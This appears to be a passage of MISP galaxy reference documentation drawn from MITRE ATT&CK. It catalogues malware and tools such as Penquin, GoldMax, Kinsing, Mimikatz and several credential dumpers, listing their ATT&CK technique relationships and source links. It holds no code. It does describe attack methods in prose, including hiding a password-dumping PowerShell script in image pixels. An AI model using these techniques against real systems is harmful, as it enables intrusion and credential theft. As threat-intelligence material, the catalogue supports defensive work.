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<td><a href="https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a">https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a</a></td>
</tr>
</tbody>
</table>

Penquin - S0587

Penquin - S0587 is a remote access trojan (RAT) with multiple versions used by [Turla](https://attack.mitre.org/groups/G0010) to target Linux systems since at least 2014.(Citation: Kaspersky Turla Penquin December 2014)(Citation: Leonardo Turla Penquin May 2020)

The tag is: misp-galaxy:mitre-malware="Penquin - S0587"

Penquin - S0587 is also known as:

- Penquin
- Penquin 2.0
- Penquin_x64

Penquin - S0587 has relationships with:
• uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Traffic Signaling - T1205" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"

Table 4895. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0587">https://attack.mitre.org/software/S0587</a></td>
</tr>
<tr>
<td><a href="https://securelist.com/the-penquin-turla-2/67962/">https://securelist.com/the-penquin-turla-2/67962/</a></td>
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<td><a href="https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf">https://www.leonardocompany.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf</a></td>
</tr>
</tbody>
</table>
GoldFinder - S0597

[GoldFinder](https://attack.mitre.org/software/S0597) is a custom HTTP tracer tool written in Go that logs the route a packet takes between a compromised network and a C2 server. It can be used to inform threat actors of potential points of discovery or logging of their actions, including C2 related to other malware. [GoldFinder](https://attack.mitre.org/software/S0597) was discovered in early 2021 during an investigation into the SolarWinds cyber intrusion by [APT29](https://attack.mitre.org/groups/G0016).(Citation: MSTIC NOBELIUM Mar 2021)

The tag is: `misp-galaxy:mitre-malware="GoldFinder - S0597"`

GoldFinder - S0597 is also known as:

- GoldFinder

GoldFinder - S0597 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Internet Connection Discovery - T1016.001"` with estimative-language:likelihood-probability="almost-certain"

Table 4896. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0597">https://attack.mitre.org/software/S0597</a></td>
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</table>

Waterbear - S0579

[Waterbear](https://attack.mitre.org/software/S0579) is modular malware attributed to [BlackTech](https://attack.mitre.org/groups/G0098) that has been used primarily for lateral movement, decrypting, and triggering payloads and is capable of hiding network behaviors.(Citation: Trend Micro Waterbear December 2019)

The tag is: `misp-galaxy:mitre-malware="Waterbear - S0579"`

Waterbear - S0579 is also known as:

- Waterbear

Waterbear - S0579 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
Table 4897. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0579">https://attack.mitre.org/software/S0579</a></td>
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</table>

GoldMax - S0588

[GoldMax](https://attack.mitre.org/software/S0588) is a second-stage C2 backdoor written in Go that was used by [APT29](https://attack.mitre.org/groups/G0016) and discovered in early 2021 during the investigation into breaches related to the SolarWinds intrusion. [GoldMax](https://attack.mitre.org/software/S0588) uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.(Citation: MSTIC NOBELIUM Mar 2021)(Citation: FireEye SUNSHUTTLE Mar 2021)

The tag is: `misp-galaxy:mitre-malware="GoldMax - S0588"`
GoldMax - S0588 is also known as:

- GoldMax
- SUNSHUTTLE

GoldMax - S0588 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"

Table 4898. Table References

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Sibot - S0589

[Sibot](https://attack.mitre.org/software/S0589) is dual-purpose malware written in VBScript designed to achieve persistence on a compromised system as well as download and execute additional payloads. Microsoft discovered three [Sibot](https://attack.mitre.org/software/S0589) variants in early 2021 during its investigation of [APT29](https://attack.mitre.org/groups/G0016) and the SolarWinds cyber intrusion campaign.(Citation: MSTIC NOBELIUM Mar 2021)

The tag is: `misp-galaxy:mitre-malware=“Sibot - S0589”`

Sibot - S0589 is also known as:

- Sibot

Sibot - S0589 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern=“Match Legitimate Name or Location - T1036.005” with estimative-language:likelihood-probability=“almost-certain”`
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"

Table 4899. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0589">https://attack.mitre.org/software/S0589</a></td>
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<tr>
<td><a href="https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/">https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/</a></td>
</tr>
</tbody>
</table>

Kinsing - S0599

[Kinsing](https://attack.mitre.org/software/S0599) is Golang-based malware that runs a cryptocurrency miner and attempts to spread itself to other hosts in the victim environment. (Citation: Aqua Kinsing April 2020)(Citation: Sysdig Kinsing November 2020)

The tag is: `misp-galaxy:mitre-malware="Kinsing - S0599"

Kinsing - S0599 is also known as:

- Kinsing

Kinsing - S0599 has relationships with:


- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Container Administration Command - T1609" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="SSH - T1021.004" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-
language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deploy Container - T1610" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Linux and Mac File and Directory Permissions Modification - T1222.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Bash History - T1552.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"

Table 4900. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0599">https://attack.mitre.org/software/S0599</a></td>
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<tr>
<td><a href="https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/">https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/</a></td>
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</tbody>
</table>

Tool

Name of ATT&CK software.

Tool is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors

MITRE
Windows Credential Editor - S0005

[Windows Credential Editor](https://attack.mitre.org/software/S0005) is a password dumping tool. (Citation: Amplia WCE)

The tag is: `misp-galaxy:mitre-tool="Windows Credential Editor - S0005"

Windows Credential Editor - S0005 is also known as:

- Windows Credential Editor
- WCE

Windows Credential Editor - S0005 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001"` with estimative-language:likelihood-probability="almost-certain"

Table 4901. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0005">https://attack.mitre.org/software/S0005</a></td>
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</tbody>
</table>

Pass-The-Hash Toolkit - S0122

[Pass-The-Hash Toolkit](https://attack.mitre.org/software/S0122) is a toolkit that allows an adversary to "pass" a password hash (without knowing the original password) to log in to systems. (Citation: Mandiant APT1)

The tag is: `misp-galaxy:mitre-tool="Pass-The-Hash Toolkit - S0122"

Pass-The-Hash Toolkit - S0122 is also known as:

- Pass-The-Hash Toolkit

Pass-The-Hash Toolkit - S0122 has relationships with:


Table 4902. Table References

<table>
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<th>Links</th>
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<tbody>
<tr>
<td><a href="https://attack.mitre.org/software/S0122">https://attack.mitre.org/software/S0122</a></td>
</tr>
<tr>
<td><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></td>
</tr>
</tbody>
</table>
CSPY Downloader - S0527

[CSPY Downloader](https://attack.mitre.org/software/S0527) is a tool designed to evade analysis and download additional payloads used by [Kimsuky](https://attack.mitre.org/groups/G0094). (Citation: Cybereason Kimsuky November 2020)

The tag is: `misp-galaxy:mitre-tool="CSPY Downloader - S0527"

CSPY Downloader - S0527 is also known as:

- CSPY Downloader

CSPY Downloader - S0527 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="System Checks - T1497.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Modify Registry - T1112"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070"` with estimative-language:likelihood-probability="almost-certain"

Table 4903. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0527">https://attack.mitre.org/software/S0527</a></td>
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</tbody>
</table>
Imminent Monitor - S0434

[Imminent Monitor](https://attack.mitre.org/software/S0434) was a commodity remote access tool (RAT) offered for sale from 2012 until 2019, when an operation was conducted to take down the Imminent Monitor infrastructure. Various cracked versions and variations of this RAT are still in circulation. (Citation: Imminent Unit42 Dec2019)

The tag is: `misp-galaxy:mitre-tool="Imminent Monitor - S0434"`

Imminent Monitor - S0434 is also known as:

- Imminent Monitor

Imminent Monitor - S0434 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083"` with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Video Capture - T1125"` with estimative-language:likelihood-probability="almost-certain"


- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="Native API - T1106"` with estimative-language:likelihood-probability="almost-certain"

- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004"` with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

Table 4904. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0434">https://attack.mitre.org/software/S0434</a></td>
</tr>
<tr>
<td><a href="https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/">https://unit42.paloaltonetworks.com/imminent-monitor-a-rat-down-under/</a></td>
</tr>
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</table>

Invoke-PSImage - S0231

[Invoke-PSImage](https://attack.mitre.org/software/S0231) takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one liner for executing either from a file of from the web. Example of usage is embedding the PowerShell code from the Invoke-Mimikatz module and embed it into an image file. By calling the image file from a macro for example, the macro will download the picture and execute the PowerShell code, which in this case will dump the passwords. (Citation: GitHub Invoke-PSImage)

The tag is: misp-galaxy:mitre-tool="Invoke-PSImage - S0231"

Invoke-PSImage - S0231 is also known as:

• Invoke-PSImage

Invoke-PSImage - S0231 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 4905. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0231">https://attack.mitre.org/software/S0231</a></td>
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<tr>
<td><a href="https://github.com/peewpw/Invoke-PSImage">https://github.com/peewpw/Invoke-PSImage</a></td>
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</table>

ipconfig - S0100

[ipconfig](https://attack.mitre.org/software/S0100) is a Windows utility that can be used to find information about a system's TCP/IP, DNS, DHCP, and adapter configuration. (Citation: TechNet Ipconfig)

The tag is: misp-galaxy:mitre-tool="ipconfig - S0100"

ipconfig - S0100 is also known as:

• ipconfig
**ipconfig.exe**

`ipconfig.exe` has relationships with:

- **uses:** `misp-galaxy/mitre-attack-pattern="System Network Configuration Discovery - T1016"` with `estimative-language:likelihood-probability="almost-certain"`

---

**Mimikatz - S0002**

[Mimikatz](https://attack.mitre.org/software/S0002) is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. ([Citation: Deply Mimikatz](https://attack.mitre.org/software/S0002)) ([Citation: Adsecurity Mimikatz Guide](https://attack.mitre.org/software/S0002))

The tag is: `misp-galaxy/mitre-tool="Mimikatz - S0002"`

**Mimikatz - S0002** is also known as:

- **Mimikatz**

**Mimikatz - S0002** has relationships with:

- **similar:** `misp-galaxy/tool="Mimikatz"` with `estimative-language:likelihood-probability="likely"`
- **uses:** `misp-galaxy/mitre-attack-pattern="Security Support Provider - T1547.005"` with `estimative-language:likelihood-probability="almost-certain"`
- **uses:** `misp-galaxy/mitre-attack-pattern="SID-History Injection - T1134.005"` with `estimative-language:likelihood-probability="almost-certain"`
- **uses:** `misp-galaxy/mitre-attack-pattern="Pass the Hash - T1550.002"` with `estimative-language:likelihood-probability="almost-certain"`
- **uses:** `misp-galaxy/mitre-attack-pattern="Rogue Domain Controller - T1207"` with `estimative-language:likelihood-probability="almost-certain"`
- **uses:** `misp-galaxy/mitre-attack-pattern="Private Keys - T1552.004"` with `estimative-language:likelihood-probability="almost-certain"`
- **uses:** `misp-galaxy/mitre-attack-pattern="Pass the Ticket - T1550.003"` with `estimative-language:likelihood-probability="almost-certain"`
- **uses:** `misp-galaxy/mitre-attack-pattern="Account Manipulation - T1098"` with `estimative-language:likelihood-probability="almost-certain"`
- **uses:** `misp-galaxy/mitre-attack-pattern="LSASS Memory - T1003.001"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Golden Ticket - T1558.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004"` with estimative-language:likelihood-probability="almost-certain"

Table 4907. Table References

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<tr>
<td><a href="https://attack.mitre.org/software/S0002">https://attack.mitre.org/software/S0002</a></td>
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<td><a href="https://github.com/gentilkiwi/mimikatz">https://github.com/gentilkiwi/mimikatz</a></td>
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<tr>
<td><a href="https://adsecurity.org/?page_id=1821">https://adsecurity.org/?page_id=1821</a></td>
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**HTRAN - S0040**

[HTRAN](https://attack.mitre.org/software/S0040) is a tool that proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks. (Citation: Operation Quantum Entanglement)(Citation: NCSC Joint Report Public Tools)

The tag is: `misp-galaxy:mitre-tool="HTRAN - S0040"`

HTRAN - S0040 is also known as:

- HTRAN
- HUC Packet Transmit Tool

HTRAN - S0040 has relationships with:

- similar: `misp-galaxy:malpedia="HTran"` with estimative-language:likelihood-probability="likely"
**Table 4908. Table References**

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<tr>
<td><a href="https://attack.mitre.org/software/S0040">https://attack.mitre.org/software/S0040</a></td>
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</table>

**MCMD - S0500**

[MCMD](https://attack.mitre.org/software/S0500) is a remote access tool that provides remote command shell capability used by [Dragonfly 2.0](https://attack.mitre.org/groups/G0074). *(Citation: Secureworks MCMD July 2019)*

The tag is: `misp-galaxy:mitre-tool="MCMD - S0500"`

MCMD - S0500 is also known as:

- MCMD

MCMD - S0500 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003"` with estimative-language:likelihood-probability="almost-certain"
pwdump - S0006

[pwdump](https://attack.mitre.org/software/S0006) is a credential dumper. (Citation: Wikipedia pwdump)

The tag is: *misp-galaxy:mitre-tool="pwdump - S0006"

pwdump - S0006 is also known as:

- pwdump

pwdump - S0006 has relationships with:


---

gsecdump - S0008

[gsecdump](https://attack.mitre.org/software/S0008) is a publicly-available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems. (Citation: TrueSec Gsecdump)

The tag is: *misp-galaxy:mitre-tool="gsecdump - S0008"

gsecdump - S0008 is also known as:

- gsecdump

gsecdump - S0008 has relationships with:

- similar: *misp-galaxy:malpedia="gsecdump" with estimative-language:likelihood-probability="likely"
• uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

Table 4911. Table References

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<td><a href="https://attack.mitre.org/software/S0008">https://attack.mitre.org/software/S0008</a></td>
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<td><a href="https://www.truesec.se/sakerhet/verktyg/sakerhet/gsecdump_v2.0b5">https://www.truesec.se/sakerhet/verktyg/sakerhet/gsecdump_v2.0b5</a></td>
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</tbody>
</table>

at - S0110

[at](https://attack.mitre.org/software/S0110) is used to schedule tasks on a system to run at a specified date or time. (Citation: TechNet At)

The tag is: misp-galaxy:mitre-tool="at - S0110"

at - S0110 is also known as:

• at
• at.exe

at - S0110 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="At (Windows) - T1053.002" with estimative-language:likelihood-probability="almost-certain"

Table 4912. Table References

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<td><a href="https://attack.mitre.org/software/S0110">https://attack.mitre.org/software/S0110</a></td>
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</table>

ifconfig - S0101

[ifconfig](https://attack.mitre.org/software/S0101) is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system. (Citation: Wikipedia Ifconfig)

The tag is: misp-galaxy:mitre-tool="ifconfig - S0101"

ifconfig - S0101 is also known as:

• ifconfig

ifconfig - S0101 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
Fgdump - S0120

[Fgdump](https://attack.mitre.org/software/S0120) is a Windows password hash dumper. (Citation: Mandiant APT1)

The tag is: misp-galaxy:mitre-tool="Fgdump - S0120"

Fgdump - S0120 is also known as:

- Fgdump

Fgdump - S0120 has relationships with:


Table 4914. Table References

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<td><a href="https://attack.mitre.org/software/S0120">https://attack.mitre.org/software/S0120</a></td>
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<td><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></td>
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</table>

nbtstat - S0102

[nbtstat](https://attack.mitre.org/software/S0102) is a utility used to troubleshoot NetBIOS name resolution. (Citation: TechNet Nbtstat)

The tag is: misp-galaxy:mitre-tool="nbtstat - S0102"

nbtstat - S0102 is also known as:

- nbtstat
- nbtstat.exe

nbtstat - S0102 has relationships with:


Table 4915. Table References

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<td><a href="https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf">https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf</a></td>
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</table>
route - S0103

(route)(https://attack.mitre.org/software/S0103) can be used to find or change information within the local system IP routing table. (Citation: TechNet Route)

The tag is: misp-galaxy:mitre-tool="route - S0103"

route - S0103 is also known as:

- route
- route.exe

route - S0103 has relationships with:


Table 4916. Table References

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<td><a href="https://attack.mitre.org/software/S0103">https://attack.mitre.org/software/S0103</a></td>
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netstat - S0104

[netstat](https://attack.mitre.org/software/S0104) is an operating system utility that displays active TCP connections, listening ports, and network statistics. (Citation: TechNet Netstat)

The tag is: misp-galaxy:mitre-tool="netstat - S0104"

netstat - S0104 is also known as:

- netstat
- netstat.exe

netstat - S0104 has relationships with:


Table 4917. Table References

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<td><a href="https://attack.mitre.org/software/S0104">https://attack.mitre.org/software/S0104</a></td>
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**dsquery - S0105**

[dsquery](https://attack.mitre.org/software/S0105) is a command-line utility that can be used to query Active Directory for information from a system within a domain. (Citation: TechNet Dsquery) It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle.

The tag is: `misp-galaxy:mitre-tool="dsquery - S0105"`

dsquery - S0105 is also known as:

- dsquery
- dsquery.exe

dsquery - S0105 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482"` with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/software/S0105">https://attack.mitre.org/software/S0105</a></td>
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**cmd - S0106**

[cmd](https://attack.mitre.org/software/S0106) is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities. (Citation: TechNet Cmd)

Cmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., `<code>dir</code>" (Citation: TechNet Dir)), deleting files (e.g., `<code>del</code>" (Citation: TechNet Del)), and copying files (e.g., `<code>copy</code>" (Citation: TechNet Copy)).

The tag is: `misp-galaxy:mitre-tool="cmd - S0106"`

cmd - S0106 is also known as:

- cmd
- cmd.exe

cmd - S0106 has relationships with:
• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 4919. Table References

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<td><a href="https://attack.mitre.org/software/S0106">https://attack.mitre.org/software/S0106</a></td>
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</table>

certutil - S0160

certutil ([https://attack.mitre.org/software/S0160](https://attack.mitre.org/software/S0160)) is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services. (Citation: TechNet Certutil)

The tag is: misp-galaxy:mitre-tool="certutil - S0160"

certutil - S0160 is also known as:

• certutil

• certutil.exe

certutil - S0160 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1553.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
netsh - S0108

[netsh](https://attack.mitre.org/software/S0108) is a scripting utility used to interact with networking components on local or remote systems. (Citation: TechNet Netsh)

The tag is: `misp-galaxy:mitre-tool="netsh - S0108"

netsh - S0108 is also known as:

- netsh
- netsh.exe

netsh - S0108 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-attack-pattern="Netsh Helper DLL - T1546.007"` with estimative-language:likelihood-probability="almost-certain"

BITSAdmin - S0190

[BITSAdmin](https://attack.mitre.org/software/S0190) is a command line tool used to create and manage [BITS Jobs](https://attack.mitre.org/techniques/T1197). (Citation: Microsoft BITSAdmin)

The tag is: `misp-galaxy:mitre-tool="BITSAdmin - S0190"

BITSAdmin - S0190 is also known as:

- BITSAdmin

BITSAdmin - S0190 has relationships with:

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"

Table 4922. Table References

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<td><a href="https://attack.mitre.org/software/S0190">https://attack.mitre.org/software/S0190</a></td>
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**Koadic - S0250**

